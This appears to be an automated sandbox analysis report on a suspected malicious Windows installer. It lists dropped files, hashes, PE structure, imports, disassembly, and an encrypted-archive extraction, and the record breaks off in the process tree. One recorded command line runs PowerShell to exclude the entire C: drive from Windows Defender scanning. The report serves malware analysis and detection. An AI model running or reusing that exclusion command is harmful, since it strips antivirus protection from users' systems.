                      MD5:4DB75814BF4A212D3AEBA5831C059402
                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                      Malicious:false
                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:NlllulJnp/p:NllU
                      MD5:BC6DB77EB243BF62DC31267706650173
                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                      Malicious:false
                      Preview:@...e.................................X..............@..........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3366912
                      Entropy (8bit):6.530549308235048
                      Encrypted:false
                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                      MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                      SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                      SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                      SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                      Process:C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32+ executable (console) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):6144
                      Entropy (8bit):4.720366600008286
                      Encrypted:false
                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3584000
                      Entropy (8bit):7.00283805408099
                      Encrypted:false
                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                      MD5:4DB75814BF4A212D3AEBA5831C059402
                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                      Malicious:false
                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32+ executable (console) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):6144
                      Entropy (8bit):4.720366600008286
                      Encrypted:false
                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3584000
                      Entropy (8bit):7.00283805408099
                      Encrypted:false
                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                      MD5:4DB75814BF4A212D3AEBA5831C059402
                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                      Malicious:false
                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3366912
                      Entropy (8bit):6.530549308235048
                      Encrypted:false
                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                      MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                      SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                      SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                      SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:ASCII text, with CRLF, CR line terminators
                      Category:dropped
                      Size (bytes):406
                      Entropy (8bit):5.117520345541057
                      Encrypted:false
                      SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                      MD5:9200058492BCA8F9D88B4877F842C148
                      SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                      SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                      SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                      Malicious:false
                      Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.920986760812326
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 98.04%
                      • Inno Setup installer (109748/4) 1.08%
                      • InstallShield setup (43055/19) 0.42%
                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                      File name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      File size:5'694'753 bytes
                      MD5:44728e21199d2b04a4b25798625ac86e
                      SHA1:382e29a97bb8a34a3164f7464692f16e3526bb1c
                      SHA256:4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
                      SHA512:cc8276fe2aa6e57ef9ade90f833dddcbf00b1edb952457c154666aa362fa915b4636d108e1738e420c2421456cc2f85f211eb2b350a0d6da8777f80a9009ee64
                      SSDEEP:98304:XwREBVV+Qh70jV13LgKYVR0jyaTnVWbaAzE0JVdMwZgW:lBCQ8j3LBYVavTIbaiE0JNF
                      TLSH:8D461222F2CBE43EE45D0B3B06B2A15894FB6A616522AD5786ECB4ECCF311501D3F647
                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                      Icon Hash:0c0c2d33ceec80aa
                      Entrypoint:0x4a83bc
                      Entrypoint Section:.itext
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:1
                      File Version Major:6
                      File Version Minor:1
                      Subsystem Version Major:6
                      Subsystem Version Minor:1
                      Import Hash:40ab50289f7ef5fae60801f88d4541fc
                      Instruction
                      push ebp
                      mov ebp, esp
                      add esp, FFFFFFA4h
                      push ebx
                      push esi
                      push edi
                      xor eax, eax
                      mov dword ptr [ebp-3Ch], eax
                      mov dword ptr [ebp-40h], eax
                      mov dword ptr [ebp-5Ch], eax
                      mov dword ptr [ebp-30h], eax
                      mov dword ptr [ebp-38h], eax
                      mov dword ptr [ebp-34h], eax
                      mov dword ptr [ebp-2Ch], eax
                      mov dword ptr [ebp-28h], eax
                      mov dword ptr [ebp-14h], eax
                      mov eax, 004A2EBCh
                      call 00007F23492E36B5h
                      xor eax, eax
                      push ebp
                      push 004A8AC1h
                      push dword ptr fs:[eax]
                      mov dword ptr fs:[eax], esp
                      xor edx, edx
                      push ebp
                      push 004A8A7Bh
                      push dword ptr fs:[edx]
                      mov dword ptr fs:[edx], esp
                      mov eax, dword ptr [004B0634h]
                      call 00007F234937503Bh
                      call 00007F2349374B8Eh
                      lea edx, dword ptr [ebp-14h]
                      xor eax, eax
                      call 00007F234936F868h
                      mov edx, dword ptr [ebp-14h]
                      mov eax, 004B41F4h
                      call 00007F23492DD763h
                      push 00000002h
                      push 00000000h
                      push 00000001h
                      mov ecx, dword ptr [004B41F4h]
                      mov dl, 01h
                      mov eax, dword ptr [0049CD14h]
                      call 00007F2349370B93h
                      mov dword ptr [004B41F8h], eax
                      xor edx, edx
                      push ebp
                      push 004A8A27h
                      push dword ptr fs:[edx]
                      mov dword ptr fs:[edx], esp
                      call 00007F23493750C3h
                      mov dword ptr [004B4200h], eax
                      mov eax, dword ptr [004B4200h]
                      cmp dword ptr [eax+0Ch], 01h
                      jne 00007F234937BDAAh
                      mov eax, dword ptr [004B4200h]
                      mov edx, 00000028h
                      call 00007F2349371488h
                      mov edx, dword ptr [004B4200h]
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      .rsrc0xcb0000x110000x1100020f7b0cee625907b1f43c38504803d33False0.18784466911764705data3.7212772086393158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                      RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                      RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                      RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                      RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                      RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                      RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                      RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                      RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                      RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                      RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                      RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                      RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                      RT_STRING0xd8e000x3f8data0.3198818897637795
                      RT_STRING0xd91f80x2dcdata0.36475409836065575
                      RT_STRING0xd94d40x430data0.40578358208955223
                      RT_STRING0xd99040x44cdata0.38636363636363635
                      RT_STRING0xd9d500x2d4data0.39226519337016574
                      RT_STRING0xda0240xb8data0.6467391304347826
                      RT_STRING0xda0dc0x9cdata0.6410256410256411
                      RT_STRING0xda1780x374data0.4230769230769231
                      RT_STRING0xda4ec0x398data0.3358695652173913
                      RT_STRING0xda8840x368data0.3795871559633027
                      RT_STRING0xdabec0x2a4data0.4275147928994083
                      RT_RCDATA0xdae900x10data1.5
                      RT_RCDATA0xdaea00x310data0.6173469387755102
                      RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                      RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                      RT_VERSION0xdb2980x584dataEnglishUnited States0.2790368271954674
                      RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                      DLLImport
                      kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                      comctl32.dllInitCommonControls
                      user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                      oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                      advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                      NameOrdinalAddress
                      __dbk_fcall_wrapper20x40fc10
                      dbkFCallWrapperAddr10x4b063c
                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      No network behavior found

                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:03:35:00
                      Start date:22/12/2024
                      Path:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
                      Imagebase:0x240000
                      File size:5'694'753 bytes
                      MD5 hash:44728E21199D2B04A4B25798625AC86E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Reputation:low
                      Has exited:true

                      Target ID:1
                      Start time:03:35:00
                      Start date:22/12/2024
                      Path:C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
                      Imagebase:0xa00000
                      File size:3'366'912 bytes
                      MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Antivirus matches:
                      • Detection: 0%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:03:35:01
                      Start date:22/12/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Imagebase:0x7ff788560000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:03:35:01
